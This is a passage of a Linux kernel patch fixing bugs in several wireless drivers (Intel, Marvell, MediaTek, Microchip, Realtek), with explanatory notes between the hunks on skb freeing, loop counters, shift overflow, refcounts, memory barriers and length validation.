+ 	il->workqueue = NULL;
++out_remove_sysfs:
+ 	sysfs_remove_group(&pdev->dev.kobj, &il3945_attribute_group);
+ out_release_irq:
+ 	free_irq(il->pci_dev->irq, il);
+diff --git a/drivers/net/wireless/intel/iwlegacy/4965-mac.c b/drivers/net/wireless/intel/iwlegacy/4965-mac.c
+index 943de47170c70..78dee8ccfebfe 100644
+--- a/drivers/net/wireless/intel/iwlegacy/4965-mac.c
++++ b/drivers/net/wireless/intel/iwlegacy/4965-mac.c
+@@ -6211,10 +6211,12 @@ out:
+ 	mutex_unlock(&il->mutex);
+ }
+ 
+-static void
++static int
+ il4965_setup_deferred_work(struct il_priv *il)
+ {
+ 	il->workqueue = create_singlethread_workqueue(DRV_NAME);
++	if (!il->workqueue)
++		return -ENOMEM;
+ 
+ 	init_waitqueue_head(&il->wait_command_queue);
+ 
+@@ -6233,6 +6235,8 @@ il4965_setup_deferred_work(struct il_priv *il)
+ 	timer_setup(&il->watchdog, il_bg_watchdog, 0);
+ 
+ 	tasklet_setup(&il->irq_tasklet, il4965_irq_tasklet);
++
++	return 0;
+ }
+ 
+ static void
+@@ -6617,7 +6621,10 @@ il4965_pci_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 		goto out_disable_msi;
+ 	}
+ 
+-	il4965_setup_deferred_work(il);
++	err = il4965_setup_deferred_work(il);
++	if (err)
++		goto out_free_irq;
++
+ 	il4965_setup_handlers(il);
+ 
+ 	/*********************************************
+@@ -6655,6 +6662,7 @@ il4965_pci_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ out_destroy_workqueue:
+ 	destroy_workqueue(il->workqueue);
+ 	il->workqueue = NULL;
++out_free_irq:
+ 	free_irq(il->pci_dev->irq, il);
+ out_disable_msi:
+ 	pci_disable_msi(il->pci_dev);
+diff --git a/drivers/net/wireless/intel/iwlegacy/common.c b/drivers/net/wireless/intel/iwlegacy/common.c
+index 341c17fe2af4d..96002121bb8b2 100644
+--- a/drivers/net/wireless/intel/iwlegacy/common.c
++++ b/drivers/net/wireless/intel/iwlegacy/common.c
+@@ -5174,7 +5174,7 @@ il_mac_reset_tsf(struct ieee80211_hw *hw, struct ieee80211_vif *vif)
+ 	memset(&il->current_ht_config, 0, sizeof(struct il_ht_config));
+ 
+ 	/* new association get rid of ibss beacon skb */
+-	dev_kfree_skb(il->beacon_skb);
++	dev_consume_skb_irq(il->beacon_skb);
+ 	il->beacon_skb = NULL;
+ 	il->timestamp = 0;
+ 
+@@ -5293,7 +5293,7 @@ il_beacon_update(struct ieee80211_hw *hw, struct ieee80211_vif *vif)
+ 	}
+ 
+ 	spin_lock_irqsave(&il->lock, flags);
+-	dev_kfree_skb(il->beacon_skb);
++	dev_consume_skb_irq(il->beacon_skb);
+ 	il->beacon_skb = skb;
+ 
+ 	timestamp = ((struct ieee80211_mgmt *)skb->data)->u.beacon.timestamp;
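The iwlegacy hunks switch dev_kfree_skb() to dev_consume_skb_irq() where the old beacon skb is released under spin_lock_irqsave(): the free must be IRQ-safe, and replacing a beacon is a normal release, not a drop, so the drop tracepoint should not fire. A comment-only map of the variants, roughly as the net core defines them (kernel fragment, real helpers):

#include <linux/skbuff.h>

/* Choosing an skb-free helper, roughly:
 *
 *   dev_kfree_skb(skb)        - not safe with IRQs disabled
 *   dev_kfree_skb_irq(skb)    - IRQ-safe (deferred), accounted as a drop
 *   dev_consume_skb_irq(skb)  - IRQ-safe, accounted as a normal release,
 *                               so packet-drop monitoring stays meaningful
 *   dev_kfree_skb_any(skb)    - picks the right drop variant at runtime
 */
static void release_beacon(struct sk_buff *skb, bool replaced_ok)
{
	if (replaced_ok)
		dev_consume_skb_irq(skb);	/* not an error, just done */
	else
		dev_kfree_skb_irq(skb);		/* counted as a drop */
}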
+diff --git a/drivers/net/wireless/intel/iwlwifi/mei/main.c b/drivers/net/wireless/intel/iwlwifi/mei/main.c
+index c0142093c7682..27eb28290e234 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mei/main.c
++++ b/drivers/net/wireless/intel/iwlwifi/mei/main.c
+@@ -784,7 +784,7 @@ static void iwl_mei_handle_amt_state(struct mei_cl_device *cldev,
+ 	if (mei->amt_enabled)
+ 		iwl_mei_set_init_conf(mei);
+ 	else if (iwl_mei_cache.ops)
+-		iwl_mei_cache.ops->rfkill(iwl_mei_cache.priv, false, false);
++		iwl_mei_cache.ops->rfkill(iwl_mei_cache.priv, false);
+ 
+ 	schedule_work(&mei->netdev_work);
+ 
+@@ -825,7 +825,7 @@ static void iwl_mei_handle_csme_taking_ownership(struct mei_cl_device *cldev,
+ 		 */
+ 		mei->csme_taking_ownership = true;
+ 
+-		iwl_mei_cache.ops->rfkill(iwl_mei_cache.priv, true, true);
++		iwl_mei_cache.ops->rfkill(iwl_mei_cache.priv, true);
+ 	} else {
+ 		iwl_mei_send_sap_msg(cldev,
+ 				     SAP_MSG_NOTIF_CSME_OWNERSHIP_CONFIRMED);
+@@ -1695,7 +1695,7 @@ int iwl_mei_register(void *priv, const struct iwl_mei_ops *ops)
+ 			if (mei->amt_enabled)
+ 				iwl_mei_send_sap_msg(mei->cldev,
+ 						     SAP_MSG_NOTIF_WIFIDR_UP);
+-			ops->rfkill(priv, mei->link_prot_state, false);
++			ops->rfkill(priv, mei->link_prot_state);
+ 		}
+ 	}
+ 	ret = 0;
+diff --git a/drivers/net/wireless/intersil/orinoco/hw.c b/drivers/net/wireless/intersil/orinoco/hw.c
+index 0aea35c9c11c7..4fcca08e50de2 100644
+--- a/drivers/net/wireless/intersil/orinoco/hw.c
++++ b/drivers/net/wireless/intersil/orinoco/hw.c
+@@ -931,6 +931,8 @@ int __orinoco_hw_setup_enc(struct orinoco_private *priv)
+ 			err = hermes_write_wordrec(hw, USER_BAP,
+ 					HERMES_RID_CNFAUTHENTICATION_AGERE,
+ 					auth_flag);
++			if (err)
++				return err;
+ 		}
+ 		err = hermes_write_wordrec(hw, USER_BAP,
+ 					   HERMES_RID_CNFWEPENABLED_AGERE,
+diff --git a/drivers/net/wireless/marvell/libertas/cmdresp.c b/drivers/net/wireless/marvell/libertas/cmdresp.c
+index cb515c5584c1f..74cb7551f4275 100644
+--- a/drivers/net/wireless/marvell/libertas/cmdresp.c
++++ b/drivers/net/wireless/marvell/libertas/cmdresp.c
+@@ -48,7 +48,7 @@ void lbs_mac_event_disconnected(struct lbs_private *priv,
+ 
+ 	/* Free Tx and Rx packets */
+ 	spin_lock_irqsave(&priv->driver_lock, flags);
+-	kfree_skb(priv->currenttxskb);
++	dev_kfree_skb_irq(priv->currenttxskb);
+ 	priv->currenttxskb = NULL;
+ 	priv->tx_pending_len = 0;
+ 	spin_unlock_irqrestore(&priv->driver_lock, flags);
+diff --git a/drivers/net/wireless/marvell/libertas/if_usb.c b/drivers/net/wireless/marvell/libertas/if_usb.c
+index 32fdc4150b605..2240b4db8c036 100644
+--- a/drivers/net/wireless/marvell/libertas/if_usb.c
++++ b/drivers/net/wireless/marvell/libertas/if_usb.c
+@@ -637,7 +637,7 @@ static inline void process_cmdrequest(int recvlength, uint8_t *recvbuff,
+ 	priv->resp_len[i] = (recvlength - MESSAGE_HEADER_LEN);
+ 	memcpy(priv->resp_buf[i], recvbuff + MESSAGE_HEADER_LEN,
+ 		priv->resp_len[i]);
+-	kfree_skb(skb);
++	dev_kfree_skb_irq(skb);
+ 	lbs_notify_command_response(priv, i);
+ 
+ 	spin_unlock_irqrestore(&priv->driver_lock, flags);
+diff --git a/drivers/net/wireless/marvell/libertas/main.c b/drivers/net/wireless/marvell/libertas/main.c
+index 8f5220cee1123..78e8b5aecec0e 100644
+--- a/drivers/net/wireless/marvell/libertas/main.c
++++ b/drivers/net/wireless/marvell/libertas/main.c
+@@ -216,7 +216,7 @@ int lbs_stop_iface(struct lbs_private *priv)
+ 
+ 	spin_lock_irqsave(&priv->driver_lock, flags);
+ 	priv->iface_running = false;
+-	kfree_skb(priv->currenttxskb);
++	dev_kfree_skb_irq(priv->currenttxskb);
+ 	priv->currenttxskb = NULL;
+ 	priv->tx_pending_len = 0;
+ 	spin_unlock_irqrestore(&priv->driver_lock, flags);
+@@ -869,6 +869,7 @@ static int lbs_init_adapter(struct lbs_private *priv)
+ 	ret = kfifo_alloc(&priv->event_fifo, sizeof(u32) * 16, GFP_KERNEL);
+ 	if (ret) {
+ 		pr_err("Out of memory allocating event FIFO buffer\n");
++		lbs_free_cmd_buffer(priv);
+ 		goto out;
+ 	}
+ 
+diff --git a/drivers/net/wireless/marvell/libertas_tf/if_usb.c b/drivers/net/wireless/marvell/libertas_tf/if_usb.c
+index 75b5319d033f3..1750f5e93de21 100644
+--- a/drivers/net/wireless/marvell/libertas_tf/if_usb.c
++++ b/drivers/net/wireless/marvell/libertas_tf/if_usb.c
+@@ -613,7 +613,7 @@ static inline void process_cmdrequest(int recvlength, uint8_t *recvbuff,
+ 	spin_lock_irqsave(&priv->driver_lock, flags);
+ 	memcpy(priv->cmd_resp_buff, recvbuff + MESSAGE_HEADER_LEN,
+ 	       recvlength - MESSAGE_HEADER_LEN);
+-	kfree_skb(skb);
++	dev_kfree_skb_irq(skb);
+ 	lbtf_cmd_response_rx(priv);
+ 	spin_unlock_irqrestore(&priv->driver_lock, flags);
+ }
+diff --git a/drivers/net/wireless/marvell/mwifiex/11n.c b/drivers/net/wireless/marvell/mwifiex/11n.c
+index 4af57e6d43932..90e4011008981 100644
+--- a/drivers/net/wireless/marvell/mwifiex/11n.c
++++ b/drivers/net/wireless/marvell/mwifiex/11n.c
+@@ -878,7 +878,7 @@ mwifiex_send_delba_txbastream_tbl(struct mwifiex_private *priv, u8 tid)
+  */
+ void mwifiex_update_ampdu_txwinsize(struct mwifiex_adapter *adapter)
+ {
+-	u8 i;
++	u8 i, j;
+ 	u32 tx_win_size;
+ 	struct mwifiex_private *priv;
+ 
+@@ -909,8 +909,8 @@ void mwifiex_update_ampdu_txwinsize(struct mwifiex_adapter *adapter)
+ 		if (tx_win_size != priv->add_ba_param.tx_win_size) {
+ 			if (!priv->media_connected)
+ 				continue;
+-			for (i = 0; i < MAX_NUM_TID; i++)
+-				mwifiex_send_delba_txbastream_tbl(priv, i);
++			for (j = 0; j < MAX_NUM_TID; j++)
++				mwifiex_send_delba_txbastream_tbl(priv, j);
+ 		}
+ 	}
+ }
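The mwifiex change is the classic reused-loop-counter bug: the interface walk and the per-TID DELBA loop shared one counter, so the inner loop left i == MAX_NUM_TID and the outer condition terminated after the first matching interface. A self-contained illustration of why the separate j matters:

	#include <stdio.h>

	#define N_IFACES	3
	#define MAX_NUM_TID	8

	int main(void)
	{
		unsigned int i, j, visited = 0;

		for (i = 0; i < N_IFACES; i++) {
			visited++;
			/* Reusing 'i' here would leave it at MAX_NUM_TID,
			 * making 'i < N_IFACES' false and skipping the
			 * remaining interfaces. */
			for (j = 0; j < MAX_NUM_TID; j++)
				;	/* send DELBA for TID j */
		}
		printf("interfaces visited: %u\n", visited);	/* 3, not 1 */
		return 0;
	}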
+diff --git a/drivers/net/wireless/mediatek/mt76/dma.c b/drivers/net/wireless/mediatek/mt76/dma.c
+index 7378c4d1e1567..478bffb7418d9 100644
+--- a/drivers/net/wireless/mediatek/mt76/dma.c
++++ b/drivers/net/wireless/mediatek/mt76/dma.c
+@@ -573,6 +573,7 @@ mt76_dma_rx_cleanup(struct mt76_dev *dev, struct mt76_queue *q)
+ 		return;
+ 
+ 	spin_lock_bh(&q->lock);
++
+ 	do {
+ 		buf = mt76_dma_dequeue(dev, q, true, NULL, NULL, &more);
+ 		if (!buf)
+@@ -580,6 +581,12 @@ mt76_dma_rx_cleanup(struct mt76_dev *dev, struct mt76_queue *q)
+ 
+ 		skb_free_frag(buf);
+ 	} while (1);
++
++	if (q->rx_head) {
++		dev_kfree_skb(q->rx_head);
++		q->rx_head = NULL;
++	}
++
+ 	spin_unlock_bh(&q->lock);
+ 
+ 	if (!q->rx_page.va)
+@@ -605,12 +612,6 @@ mt76_dma_rx_reset(struct mt76_dev *dev, enum mt76_rxq_id qid)
+ 	mt76_dma_rx_cleanup(dev, q);
+ 	mt76_dma_sync_idx(dev, q);
+ 	mt76_dma_rx_fill(dev, q);
+-
+-	if (!q->rx_head)
+-		return;
+-
+-	dev_kfree_skb(q->rx_head);
+-	q->rx_head = NULL;
+ }
+ 
+ static void
+diff --git a/drivers/net/wireless/mediatek/mt76/mt76_connac_mac.c b/drivers/net/wireless/mediatek/mt76/mt76_connac_mac.c
+index 34ac3d81a5102..46ede1b72bbee 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt76_connac_mac.c
++++ b/drivers/net/wireless/mediatek/mt76/mt76_connac_mac.c
+@@ -921,7 +921,7 @@ int mt76_connac2_reverse_frag0_hdr_trans(struct ieee80211_vif *vif,
+ 		ether_addr_copy(hdr.addr4, eth_hdr->h_source);
+ 		break;
+ 	default:
+-		break;
++		return -EINVAL;
+ 	}
+ 
+ 	skb_pull(skb, hdr_offset + sizeof(struct ethhdr) - 2);
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7915/debugfs.c b/drivers/net/wireless/mediatek/mt76/mt7915/debugfs.c
+index 6ef3431cad648..2975128a78c90 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7915/debugfs.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7915/debugfs.c
+@@ -759,7 +759,7 @@ mt7915_hw_queue_read(struct seq_file *s, u32 size,
+ 		if (val & BIT(map[i].index))
+ 			continue;
+ 
+-		ctrl = BIT(31) | (map[i].pid << 10) | (map[i].qid << 24);
++		ctrl = BIT(31) | (map[i].pid << 10) | ((u32)map[i].qid << 24);
+ 		mt76_wr(dev, MT_FL_Q0_CTRL, ctrl);
+ 
+ 		head = mt76_get_field(dev, MT_FL_Q2_CTRL,
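The (u32) cast matters because of C's integer promotions: map[i].qid is a u8, which is promoted to signed int before the shift, and a value shifted into bit 31 of a signed int is undefined behaviour (typically reported by UBSAN as shift-out-of-bounds). Widening first keeps the whole expression unsigned:

	#include <stdint.h>
	#include <stdio.h>

	int main(void)
	{
		uint8_t qid = 0xff;	/* worst case for the promoted shift */

		/* qid << 24 alone would overflow a signed int: UB */
		uint32_t ok = (uint32_t)qid << 24;

		printf("0x%08x\n", ok);	/* 0xff000000 */
		return 0;
	}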
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7915/eeprom.c b/drivers/net/wireless/mediatek/mt76/mt7915/eeprom.c
+index 0bce0ce51be00..f0ec000d46cf7 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7915/eeprom.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7915/eeprom.c
+@@ -110,18 +110,23 @@ static int mt7915_eeprom_load(struct mt7915_dev *dev)
+ 	} else {
+ 		u8 free_block_num;
+ 		u32 block_num, i;
++		u32 eeprom_blk_size = MT7915_EEPROM_BLOCK_SIZE;
+ 
+-		mt7915_mcu_get_eeprom_free_block(dev, &free_block_num);
+-		/* efuse info not enough */
++		ret = mt7915_mcu_get_eeprom_free_block(dev, &free_block_num);
++		if (ret < 0)
++			return ret;
++
++		/* efuse info isn't enough */
+ 		if (free_block_num >= 29)
+ 			return -EINVAL;
+ 
+ 		/* read eeprom data from efuse */
+-		block_num = DIV_ROUND_UP(eeprom_size,
+-					 MT7915_EEPROM_BLOCK_SIZE);
+-		for (i = 0; i < block_num; i++)
+-			mt7915_mcu_get_eeprom(dev,
+-					      i * MT7915_EEPROM_BLOCK_SIZE);
++		block_num = DIV_ROUND_UP(eeprom_size, eeprom_blk_size);
++		for (i = 0; i < block_num; i++) {
++			ret = mt7915_mcu_get_eeprom(dev, i * eeprom_blk_size);
++			if (ret < 0)
++				return ret;
++		}
+ 	}
+ 
+ 	return mt7915_check_eeprom(dev);
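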
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7915/init.c b/drivers/net/wireless/mediatek/mt76/mt7915/init.c
+index cc2aac86bcfb6..38e94187d5eda 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7915/init.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7915/init.c
+@@ -200,8 +200,7 @@ static int mt7915_thermal_init(struct mt7915_phy *phy)
+ 	phy->throttle_temp[0] = 110;
+ 	phy->throttle_temp[1] = 120;
+ 
+-	return mt7915_mcu_set_thermal_throttling(phy,
+-						 MT7915_THERMAL_THROTTLE_MAX);
++	return 0;
+ }
+ 
+ static void mt7915_led_set_config(struct led_classdev *led_cdev,
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7915/mac.c b/drivers/net/wireless/mediatek/mt76/mt7915/mac.c
+index e6bf6e04d4b9c..1f3b7e7f48d50 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7915/mac.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7915/mac.c
+@@ -997,9 +997,6 @@ static void mt7915_mac_add_txs(struct mt7915_dev *dev, void *data)
+ 	u16 wcidx;
+ 	u8 pid;
+ 
+-	if (le32_get_bits(txs_data[0], MT_TXS0_TXS_FORMAT) > 1)
+-		return;
+-
+ 	wcidx = le32_get_bits(txs_data[2], MT_TXS2_WCID);
+ 	pid = le32_get_bits(txs_data[3], MT_TXS3_PID);
+ 
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7915/main.c b/drivers/net/wireless/mediatek/mt76/mt7915/main.c
+index 89b519cfd14c3..060cb88e82e30 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7915/main.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7915/main.c
+@@ -57,6 +57,12 @@ static int mt7915_start(struct ieee80211_hw *hw)
+ 		mt7915_mac_enable_nf(dev, 1);
+ 	}
+ 
++	ret = mt7915_mcu_set_thermal_throttling(phy,
++						MT7915_THERMAL_THROTTLE_MAX);
++
++	if (ret)
++		goto out;
++
+ 	ret = mt76_connac_mcu_set_rts_thresh(&dev->mt76, 0x92b,
+ 					     phy != &dev->phy);
+ 	if (ret)
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7915/mcu.c b/drivers/net/wireless/mediatek/mt76/mt7915/mcu.c
+index 8d297e4aa7d43..bcfc30d669c20 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7915/mcu.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7915/mcu.c
+@@ -2299,13 +2299,14 @@ void mt7915_mcu_exit(struct mt7915_dev *dev)
+ 	__mt76_mcu_restart(&dev->mt76);
+ 	if (mt7915_firmware_state(dev, false)) {
+ 		dev_err(dev->mt76.dev, "Failed to exit mcu\n");
+-		return;
++		goto out;
+ 	}
+ 
+ 	mt76_wr(dev, MT_TOP_LPCR_HOST_BAND(0), MT_TOP_LPCR_HOST_FW_OWN);
+ 	if (dev->hif2)
+ 		mt76_wr(dev, MT_TOP_LPCR_HOST_BAND(1),
+ 			MT_TOP_LPCR_HOST_FW_OWN);
++out:
+ 	skb_queue_purge(&dev->mt76.mcu.res_q);
+ }
+ 
+@@ -2743,8 +2744,9 @@ int mt7915_mcu_get_eeprom(struct mt7915_dev *dev, u32 offset)
+ 	int ret;
+ 	u8 *buf;
+ 
+-	ret = mt76_mcu_send_and_get_msg(&dev->mt76, MCU_EXT_QUERY(EFUSE_ACCESS), &req,
+-				sizeof(req), true, &skb);
++	ret = mt76_mcu_send_and_get_msg(&dev->mt76,
++					MCU_EXT_QUERY(EFUSE_ACCESS),
++					&req, sizeof(req), true, &skb);
+ 	if (ret)
+ 		return ret;
+ 
+@@ -2769,8 +2771,9 @@ int mt7915_mcu_get_eeprom_free_block(struct mt7915_dev *dev, u8 *block_num)
+ 	struct sk_buff *skb;
+ 	int ret;
+ 
+-	ret = mt76_mcu_send_and_get_msg(&dev->mt76, MCU_EXT_QUERY(EFUSE_FREE_BLOCK), &req,
+-					sizeof(req), true, &skb);
++	ret = mt76_mcu_send_and_get_msg(&dev->mt76,
++					MCU_EXT_QUERY(EFUSE_FREE_BLOCK),
++					&req, sizeof(req), true, &skb);
+ 	if (ret)
+ 		return ret;
+ 
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7915/mmio.c b/drivers/net/wireless/mediatek/mt76/mt7915/mmio.c
+index 7bd5f6725d7b7..bc68ede64ddbb 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7915/mmio.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7915/mmio.c
+@@ -436,7 +436,7 @@ static u32 __mt7915_reg_addr(struct mt7915_dev *dev, u32 addr)
+ 
+ 	if (dev_is_pci(dev->mt76.dev) &&
+ 	    ((addr >= MT_CBTOP1_PHY_START && addr <= MT_CBTOP1_PHY_END) ||
+-	     (addr >= MT_CBTOP2_PHY_START && addr <= MT_CBTOP2_PHY_END)))
++	    addr >= MT_CBTOP2_PHY_START))
+ 		return mt7915_reg_map_l1(dev, addr);
+ 
+ 	/* CONN_INFRA: convert to physical addr and use layer 1 remap */
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7915/regs.h b/drivers/net/wireless/mediatek/mt76/mt7915/regs.h
+index 5920e705835a7..bf569aa0057a7 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7915/regs.h
++++ b/drivers/net/wireless/mediatek/mt76/mt7915/regs.h
+@@ -740,7 +740,6 @@ enum offs_rev {
+ #define MT_CBTOP1_PHY_START		0x70000000
+ #define MT_CBTOP1_PHY_END		__REG(CBTOP1_PHY_END)
+ #define MT_CBTOP2_PHY_START		0xf0000000
+-#define MT_CBTOP2_PHY_END		0xffffffff
+ #define MT_INFRA_MCU_START		0x7c000000
+ #define MT_INFRA_MCU_END		__REG(INFRA_MCU_ADDR_END)
+ #define MT_CONN_INFRA_OFFSET(p)		((p) - MT_INFRA_BASE)
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7915/soc.c b/drivers/net/wireless/mediatek/mt76/mt7915/soc.c
+index c74afa746251b..ee7ddda4288b8 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7915/soc.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7915/soc.c
+@@ -278,6 +278,7 @@ static int mt7986_wmac_coninfra_setup(struct mt7915_dev *dev)
+ 		return -EINVAL;
+ 
+ 	rmem = of_reserved_mem_lookup(np);
++	of_node_put(np);
+ 	if (!rmem)
+ 		return -EINVAL;
+ 
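The of_node_put() addition fixes an OF refcount leak: lookups that return a struct device_node hand the caller a reference that must be dropped once the node is no longer needed, whether or not the next step succeeds. Kernel-style sketch of the discipline (lookup_rmem() is an illustrative wrapper, not a function in this driver):

	static int lookup_rmem(struct device *dev, struct reserved_mem **out)
	{
		struct device_node *np;
		struct reserved_mem *rmem;

		np = of_parse_phandle(dev->of_node, "memory-region", 0);
		if (!np)
			return -EINVAL;

		rmem = of_reserved_mem_lookup(np);
		of_node_put(np);	/* done with the node either way */
		if (!rmem)
			return -EINVAL;

		*out = rmem;
		return 0;
	}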
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7921/acpi_sar.c b/drivers/net/wireless/mediatek/mt76/mt7921/acpi_sar.c
+index 47e034a9b0037..ed9241d4aa641 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7921/acpi_sar.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7921/acpi_sar.c
+@@ -33,14 +33,17 @@ mt7921_acpi_read(struct mt7921_dev *dev, u8 *method, u8 **tbl, u32 *len)
+ 	    sar_root->package.elements[0].type != ACPI_TYPE_INTEGER) {
+ 		dev_err(mdev->dev, "sar cnt = %d\n",
+ 			sar_root->package.count);
++		ret = -EINVAL;
+ 		goto free;
+ 	}
+ 
+ 	if (!*tbl) {
+ 		*tbl = devm_kzalloc(mdev->dev, sar_root->package.count,
+ 				    GFP_KERNEL);
+-		if (!*tbl)
++		if (!*tbl) {
++			ret = -ENOMEM;
+ 			goto free;
++		}
+ 	}
+ 	if (len)
+ 		*len = sar_root->package.count;
+@@ -52,9 +55,9 @@ mt7921_acpi_read(struct mt7921_dev *dev, u8 *method, u8 **tbl, u32 *len)
+ 			break;
+ 		*(*tbl + i) = (u8)sar_unit->integer.value;
+ 	}
+-free:
+ 	ret = (i == sar_root->package.count) ? 0 : -EINVAL;
+ 
++free:
+ 	kfree(sar_root);
+ 
+ 	return ret;
+diff --git a/drivers/net/wireless/mediatek/mt76/sdio.c b/drivers/net/wireless/mediatek/mt76/sdio.c
+index 0ec308f99af5a..176207f3177c4 100644
+--- a/drivers/net/wireless/mediatek/mt76/sdio.c
++++ b/drivers/net/wireless/mediatek/mt76/sdio.c
+@@ -562,6 +562,10 @@ mt76s_tx_queue_skb_raw(struct mt76_dev *dev, struct mt76_queue *q,
+ 
+ 	q->entry[q->head].buf_sz = len;
+ 	q->entry[q->head].skb = skb;
++
++	/* ensure the entry fully updated before bus access */
++	smp_wmb();
++
+ 	q->head = (q->head + 1) % q->ndesc;
+ 	q->queued++;
+ 
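The new smp_wmb() is a publication barrier. q->head is what the other side polls, so the stores filling q->entry[q->head] must become visible before the store that advances head; a weakly ordered CPU may otherwise reorder them. Sketched as a pair (the reader needs a matching smp_rmb() or acquire load before dereferencing the entry; where exactly that lives in mt76 is outside this hunk):

	/* producer */
	e->buf_sz = len;
	e->skb = skb;
	smp_wmb();				/* entry stores before head store */
	q->head = (q->head + 1) % q->ndesc;

	/* consumer */
	head = READ_ONCE(q->head);
	smp_rmb();				/* head load before entry loads */
	/* entries up to 'head' are now safe to read */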
+diff --git a/drivers/net/wireless/mediatek/mt76/sdio_txrx.c b/drivers/net/wireless/mediatek/mt76/sdio_txrx.c
+index bfc4de50a4d23..ddd8c0cc744df 100644
+--- a/drivers/net/wireless/mediatek/mt76/sdio_txrx.c
++++ b/drivers/net/wireless/mediatek/mt76/sdio_txrx.c
+@@ -254,6 +254,10 @@ static int mt76s_tx_run_queue(struct mt76_dev *dev, struct mt76_queue *q)
+ 
+ 		if (!test_bit(MT76_STATE_MCU_RUNNING, &dev->phy.state)) {
+ 			__skb_put_zero(e->skb, 4);
++			err = __skb_grow(e->skb, roundup(e->skb->len,
++							 sdio->func->cur_blksize));
++			if (err)
++				return err;
+ 			err = __mt76s_xmit_queue(dev, e->skb->data,
+ 						 e->skb->len);
+ 			if (err)
+diff --git a/drivers/net/wireless/mediatek/mt7601u/dma.c b/drivers/net/wireless/mediatek/mt7601u/dma.c
+index 457147394edc4..773a1cc2f8520 100644
+--- a/drivers/net/wireless/mediatek/mt7601u/dma.c
++++ b/drivers/net/wireless/mediatek/mt7601u/dma.c
+@@ -123,7 +123,8 @@ static u16 mt7601u_rx_next_seg_len(u8 *data, u32 data_len)
+ 	if (data_len < min_seg_len ||
+ 	    WARN_ON_ONCE(!dma_len) ||
+ 	    WARN_ON_ONCE(dma_len + MT_DMA_HDRS > data_len) ||
+-	    WARN_ON_ONCE(dma_len & 0x3))
++	    WARN_ON_ONCE(dma_len & 0x3) ||
++	    WARN_ON_ONCE(dma_len < min_seg_len))
+ 		return 0;
+ 
+ 	return MT_DMA_HDRS + dma_len;
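dma_len is read straight out of a device-supplied RX header, so before it is used to compute the next segment boundary it needs an upper bound, alignment, and (with this fix) a lower bound. A generic shape for validating such a field, with overflow-safe ordering of the checks:

	#include <stdbool.h>
	#include <stdint.h>

	static bool seg_len_valid(uint32_t dma_len, uint32_t data_len,
				  uint32_t hdr_len, uint32_t min_seg_len)
	{
		if (data_len < hdr_len)			/* room for the header */
			return false;
		if (dma_len & 0x3)			/* 4-byte alignment */
			return false;
		if (dma_len < min_seg_len ||		/* lower bound (the fix) */
		    dma_len > data_len - hdr_len)	/* upper bound */
			return false;
		return true;
	}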
+diff --git a/drivers/net/wireless/microchip/wilc1000/netdev.c b/drivers/net/wireless/microchip/wilc1000/netdev.c
+index 9b319a455b96d..e9f59de31b0b9 100644
+--- a/drivers/net/wireless/microchip/wilc1000/netdev.c
++++ b/drivers/net/wireless/microchip/wilc1000/netdev.c
+@@ -730,6 +730,7 @@ netdev_tx_t wilc_mac_xmit(struct sk_buff *skb, struct net_device *ndev)
+ 
+ 	if (skb->dev != ndev) {
+ 		netdev_err(ndev, "Packet not destined to this device\n");
++		dev_kfree_skb(skb);
+ 		return NETDEV_TX_OK;
+ 	}
+ 
+@@ -980,7 +981,7 @@ struct wilc_vif *wilc_netdev_ifc_init(struct wilc *wl, const char *name,
+ 						    ndev->name);
+ 	if (!wl->hif_workqueue) {
+ 		ret = -ENOMEM;
+-		goto error;
++		goto unregister_netdev;
+ 	}
+ 
+ 	ndev->needs_free_netdev = true;
+@@ -995,6 +996,11 @@ struct wilc_vif *wilc_netdev_ifc_init(struct wilc *wl, const char *name,
+ 
+ 	return vif;
+ 
++unregister_netdev:
++	if (rtnl_locked)
++		cfg80211_unregister_netdevice(ndev);
++	else
++		unregister_netdev(ndev);
+   error:
+ 	free_netdev(ndev);
+ 	return ERR_PTR(ret);
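Both wilc1000 hunks are ownership fixes. The xmit one follows the .ndo_start_xmit contract: NETDEV_TX_OK tells the core the driver consumed the skb, so a drop path that returns it must also free the buffer. The init one makes a late failure unwind the registration that already succeeded. Sketch of the xmit rule (ready_to_tx() is an illustrative placeholder):

	static netdev_tx_t example_xmit(struct sk_buff *skb,
					struct net_device *ndev)
	{
		if (unlikely(!ready_to_tx(ndev))) {
			dev_kfree_skb(skb);	/* TX_OK means we own it */
			return NETDEV_TX_OK;
		}

		/* queue to hardware; freed later from the TX-done path */
		return NETDEV_TX_OK;
	}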
+diff --git a/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_8192e.c b/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_8192e.c
+index b06508d0cdf8f..46767dc6d6491 100644
+--- a/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_8192e.c
++++ b/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_8192e.c
+@@ -1669,6 +1669,11 @@ static void rtl8192e_enable_rf(struct rtl8xxxu_priv *priv)
